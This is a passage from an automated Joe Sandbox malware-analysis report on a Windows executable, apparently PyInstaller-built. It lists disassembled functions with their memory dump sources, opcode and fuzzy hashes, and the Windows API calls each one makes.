• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
• Instruction ID: d8be70a44356c56241386cfa9c8c11889fd9208444260b59396a007f57c0a65e
• Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
• Instruction Fuzzy Hash: 63C1B123A0868681FB60BB15D840ABDE765EF81B80FD541B1EA9E87791DF7CF8458720

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
• Instruction ID: 0264a41a53313091f6e2b0f701fc792eaff1be187ff13afab43d8562afb5d7a4
• Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
• Instruction Fuzzy Hash: 56212F22A0C68382FB10BB55F85522AE7A0EF857A0FD04275EA6D43BE8DF6CE4458750

Control-flow Graph

APIs
  • Part of subcall function 00007FF70AEF8760: GetCurrentProcess.KERNEL32 ref: 00007FF70AEF8780
  • Part of subcall function 00007FF70AEF8760: OpenProcessToken.ADVAPI32 ref: 00007FF70AEF8793
  • Part of subcall function 00007FF70AEF8760: GetTokenInformation.KERNELBASE ref: 00007FF70AEF87B8
  • Part of subcall function 00007FF70AEF8760: GetLastError.KERNEL32 ref: 00007FF70AEF87C2
  • Part of subcall function 00007FF70AEF8760: GetTokenInformation.KERNELBASE ref: 00007FF70AEF8802
  • Part of subcall function 00007FF70AEF8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF70AEF881E
  • Part of subcall function 00007FF70AEF8760: CloseHandle.KERNEL32 ref: 00007FF70AEF8836
• LocalFree.KERNEL32(?,00007FF70AEF3C55), ref: 00007FF70AEF916C
• LocalFree.KERNEL32(?,00007FF70AEF3C55), ref: 00007FF70AEF9175
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
• Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
• Instruction ID: fcc7c71aa7b32041306b94bf076678539fb7cff762b83b3079e2d2c128a1ca8f
• Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
• Instruction Fuzzy Hash: BF212D22A0874281FB10BB20ED163EAA265EF88780FD540B5EA4D53796DF3CE9458760

Control-flow Graph
• Interactive graph rendering not recoverable from this export; the raw basic-block edge list is omitted. Blocks in this function call GetConsoleMode, WriteFile and GetLastError.
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70AF0CFBB), ref: 00007FF70AF0D0EC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70AF0CFBB), ref: 00007FF70AF0D177
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction ID: 31c21cd6fb3c3dd9ea2fe5ff3d2b067b9f21b1c51533d4936ffe5fa6f984f78e
• Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction Fuzzy Hash: 5791B433F1865289F750AFA5DC40ABDABA0AF54B88F944179DE0E97685CF38F442C720
APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction ID: d8180f6def151326dbc1838c76f2bf16523ede016d29520c416496f25ee76b2a
• Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction Fuzzy Hash: 5841A323E1878183F710AB20DA14779A660FF94794F508374EA9C43AD1DFACF5E08B20
APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction ID: d1609d965e06dc936c98098a51463899f5b44f64e64dc5ffb9316cd8e654285f
• Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction Fuzzy Hash: FF313923E0910B45FA64BB24DC623BD9A91DF81388FE444B4D94D472D7EF2DF9058271
APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
• Instruction ID: 169c4b68ed5c495b2cfa806dae7e8f2c7d72f0b895a3ed861a5ac919cbb59411
• Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
• Instruction Fuzzy Hash: F6D09212B0874682FB183B71ECD95789251AF48B41F9524B8C81B96393EFBCF8498320
APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
• Instruction ID: 8904f91e918180b32b458b9785e52638a2be3ec1f5803303236cfd045378d9da
• Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
• Instruction Fuzzy Hash: 4751B463B0964286FB69BA25DC00F7AE291AF44BA4F944774DE6D877C5CF3CF5018620
APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                                                      • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                      • Instruction ID: 7d0dae6b50ed8ee86f9edc4d204c61f96a028eb310d78eca462451c161d14f38
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0611C163A18A8181EA10AB25EC04169E761BF45BF4FA44371EE7D8B7E9CF3CE4128740
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9CE
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9D8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                      • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                      • Instruction ID: 94484a63634749b173e583ce56297fcc0ec0ea182ce31badd5ae874ae0314ab0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6E0E653F0960292FF14BBB2DC5557991516F88781FC541B4D91DC63A2DF2CF9958330
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF70AF0AA45,?,?,00000000,00007FF70AF0AAFA), ref: 00007FF70AF0AC36
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF70AF0AA45,?,?,00000000,00007FF70AF0AAFA), ref: 00007FF70AF0AC40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 918212764-0
                                                                                                                                                                                                                                      • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                      • Instruction ID: 2de4f26aef4a5b3e9c6e134038262d46ec0bc3baf182b0f353800aed688d131d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39219223F1C74242FA90B761DC90679A6829F847D0F8982B5DA5E873C5CF6CF4458320
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                      • Instruction ID: 10952221de418d8ed30ce924127b23db621f77b7a1fcb8c20c9ae54372dbcb48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E41B033A0820187FA34AB69E940679F7A5EF55B85F900271DA8EC7691CF2DF402CB61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                                                                                      • Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                                      • Instruction ID: b6fc69e9af38730cc8854a37869a7b1758ee6dd377aa39ffb8933750b3c350f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3217C22B0865286FA10BA22AD157BAE651FF45BD4FC844B0EE4D4B786DF7DE1418720
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
• Instruction ID: add30c43ce8e63f8e82bfcfe1e3518145a79bfc55c4659c0461433c091d73cb2
• Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
• Instruction Fuzzy Hash: B6316D23A1864286F7517B65CC41B7DA660AF40BA6FD201B5EA6D833D2DF7CF4418731
APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction ID: 5b238d7ce1e8125ae7035ed88fbb38457c7473da8b8a9fc4cf3612eee2032bb6
• Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction Fuzzy Hash: 33218132E047818AFB24AF64C8846EC73A0EF44718F844675D61D86AD6EF78E544C760
APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction ID: b085b8653ca7fec3c25dfae4fb8990d541bce2b2f9bb30323eb3c288c9e2de20
• Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction Fuzzy Hash: C3115423A1C64141FA60BF61D80097DE264AF45BC1FC58071EB4CD7A96DF7DF5408B20
APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
• Instruction ID: 8015551807c12e99e3128f894cc23b8a52d38d6e18f163b301efe295db38206e
• Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
• Instruction Fuzzy Hash: 0F21877361868187EBA5AF18D840779B6A0FF84B94F944274E69DC77D5DF3CE4008B10
APIs
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: 788f8dc0f82b614d1b8e4cc5293acc88a32f972fd1d59c2380323b68b5e7fa19
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction Fuzzy Hash: 7901C227A0874140FA20BB52DD01969E691AF81FE0F884671DE5C93BD6CF3CF0014314
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF70AF0B39A,?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA), ref: 00007FF70AF0EC5D
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
• Instruction ID: a78118a8db4834ceeef7da0a25f9335e26a27e49eec8385fd8aafaa7247c1787
